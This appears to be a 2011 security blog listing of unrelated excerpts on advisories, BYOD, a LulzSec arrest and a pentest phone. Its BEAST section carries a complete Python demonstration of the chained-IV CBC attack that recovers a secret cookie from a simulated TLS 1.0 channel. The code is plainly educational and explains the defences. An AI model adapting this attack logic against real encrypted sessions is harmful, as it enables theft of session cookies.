While the thoughts of many of us may turn to (American) football, Halloween, and raking leaves (at least those of us on the East Coast of the U.S.), the turning of the calendar page to October also means something else to all of us in the cyber security world. October 2011 marks the eighth annual National Cyber Security Awareness Month sponsored by the Department of Homeland Security, in cooperation with the National Cyber Security Alliance (NCSA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC).
Once again it’s time for Cisco’s semi-annual Cisco IOS Software Security Advisory Bundled Publication. Today’s edition of the bundle contains a total of nine IOS-related advisories and one non-IOS advisory for the Cisco Unified Communications Manager (CUCM) family of products. Included in the 10 Security Advisories are a total of 19 Cisco Bug IDs, each one representing an individual vulnerability.
Today, IT departments are receiving an increasing number of requests to support more mobile devices from a broader range of manufacturers than ever before. In fact, yesterday’s New York Times took a good look at companies that embrace BYOD (bring your own device). The gist is that today’s employee wants to use these mobile devices to improve their productivity. Traditionally this has been at odds with IT departments, because of limited resources, corporate security concerns and data protection requirements.
Juliano Rizzo and Thai Duong presented a new attack on Transport Layer Security (TLS) at the Ekoparty security conference in Buenos Aires, Argentina. This presentation has received a lot of media attention and has also caused a lot of confusion, especially since the full details were not yet public. The researchers named their proof-of-concept tool “Browser Exploit Against SSL/TLS” (BEAST) and claim that it can decrypt secure cookies in minutes. The protocol deficiency they are highlighting is the way block ciphers in CBC mode are chained in SSL 3.0 and TLS 1.0: the IV for each record is the last ciphertext block of the previous record, so an attacker who can observe the traffic knows the IV before the next record is encrypted, and an attacker who can also make the victim’s browser send chosen plaintext can test guesses for a secret byte one block at a time.
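To make the chained-IV weakness concrete, the following is an added example written for this page; it is not the researchers’ BEAST tool or any Cisco code. It simulates a TLS 1.0-style record layer (CBC, with each record’s IV taken from the previous ciphertext block) and an attacker who can make the victim encrypt attacker-chosen data followed by a secret, observe the ciphertext, and submit fully chosen single-block records. The block cipher is a constructed stand-in (HMAC-SHA256 truncated to one block, since the attack never needs decryption), the secret value is made up, and the names `ChainedCBC`, `beast_recover` and `demo` are this example’s own.

```python
import hashlib
import hmac
import os

BLOCK = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class ChainedCBC:
    """Stand-in for a TLS 1.0 / SSL 3.0 record layer: CBC mode in which each
    record's IV is the last ciphertext block of the previous record, so an
    eavesdropper knows the IV before the next record is encrypted."""

    def __init__(self, key: bytes):
        self.key = key
        self.iv = os.urandom(BLOCK)  # only the very first IV is unpredictable

    def _e(self, block: bytes) -> bytes:
        # Constructed stand-in for the block cipher (HMAC-SHA256 truncated to
        # one block). The attack never decrypts, so any keyed, deterministic
        # one-block function plays the role AES or 3DES would in real TLS.
        return hmac.new(self.key, block, hashlib.sha256).digest()[:BLOCK]

    def encrypt_record(self, plaintext: bytes) -> bytes:
        assert len(plaintext) % BLOCK == 0
        out, prev = [], self.iv
        for i in range(0, len(plaintext), BLOCK):
            prev = self._e(xor(plaintext[i:i + BLOCK], prev))
            out.append(prev)
        self.iv = prev  # chained IV: visible to anyone watching the wire
        return b"".join(out)


def beast_recover(channel, secret_len, send_request, send_chosen):
    """Recover `secret_len` bytes of a secret that the victim appends to
    attacker-chosen data, one byte per round of at most 256 guesses."""
    recovered = b""
    for k in range(secret_len):
        # Choose a prefix length so that secret[k] is the last byte of a block
        # whose other 15 bytes are attacker-chosen or already recovered.
        L = (BLOCK - 1 - k) % BLOCK + BLOCK
        prefix = b"A" * L
        ct = send_request(prefix)             # victim encrypts prefix || secret
        m = (L + k) // BLOCK                  # index of the target block (>= 1)
        c_prev = ct[(m - 1) * BLOCK: m * BLOCK]
        c_target = ct[m * BLOCK:(m + 1) * BLOCK]
        known15 = (prefix + recovered)[m * BLOCK: m * BLOCK + BLOCK - 1]
        for g in range(256):
            iv = channel.iv                   # the attacker observed this block
            guess_block = known15 + bytes([g])
            # XOR away the predictable IV and substitute c_prev: if g is right,
            # the cipher input equals the target block's input, so the
            # ciphertexts are identical.
            probe = xor(xor(iv, c_prev), guess_block)
            if send_chosen(probe) == c_target:
                recovered += bytes([g])
                break
        else:
            raise RuntimeError("no guess matched; secret byte not recovered")
    return recovered


def demo(secret: bytes = b"session=7f3a9c0e1b2d") -> bytes:
    """Run the attack against a fresh channel; returns the recovered secret."""
    channel = ChainedCBC(os.urandom(32))

    def send_request(prefix: bytes) -> bytes:
        # Victim's browser: attacker-controlled path/body, then the cookie.
        pt = prefix + secret
        pt += b"\x00" * ((-len(pt)) % BLOCK)  # simplified padding
        return channel.encrypt_record(pt)

    def send_chosen(block: bytes) -> bytes:
        # A fully attacker-chosen one-block record (injected script in BEAST).
        return channel.encrypt_record(block)

    return beast_recover(channel, len(secret), send_request, send_chosen)


if __name__ == "__main__":
    print(demo())
```

The attack works against any block cipher, because only the chaining is at fault: a correct guess produces the exact same cipher input as the target block, so the ciphertexts match deterministically and at most 256 tries are needed per byte. Removing the attacker’s knowledge of the IV is what defeats it, which is why TLS 1.1 and later use an explicit per-record IV and why TLS 1.0 stacks adopted the 1/n-1 record-splitting workaround.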
I was disheartened to read about the 22 September arrest of alleged LulzSec/Anonymous member Cody Kretsinger (known by the handle ‘recursion’) by the FBI as a suspect in the SQL injection attacks on multiple Sony websites. Note that I was not sad to see the good guys bust a cybercriminal, but I was sad to see a nice guy I had met and talked to briefly at BlackHat Las Vegas 2011 turn out to be a suspect wanted by the FBI.
One of the things we at Cisco try to do is reach out to those studying infosec and wanting to make a career in security. At BlackHat, Cisco had a contest where the winner got a Pwnie Express PWN Phone, effectively a modified Nokia N900 with some pentesting software loaded. A group of guys, volunteers with the show from an IT school, were fascinated by the PWN Phone – possibly because in their circle a couple of them had Nokia N900s, a device relatively unknown in North America but somewhat popular in certain hacking circles because its OS is Linux-based and thus can be made to run things like Metasploit (as the PWN Phone does).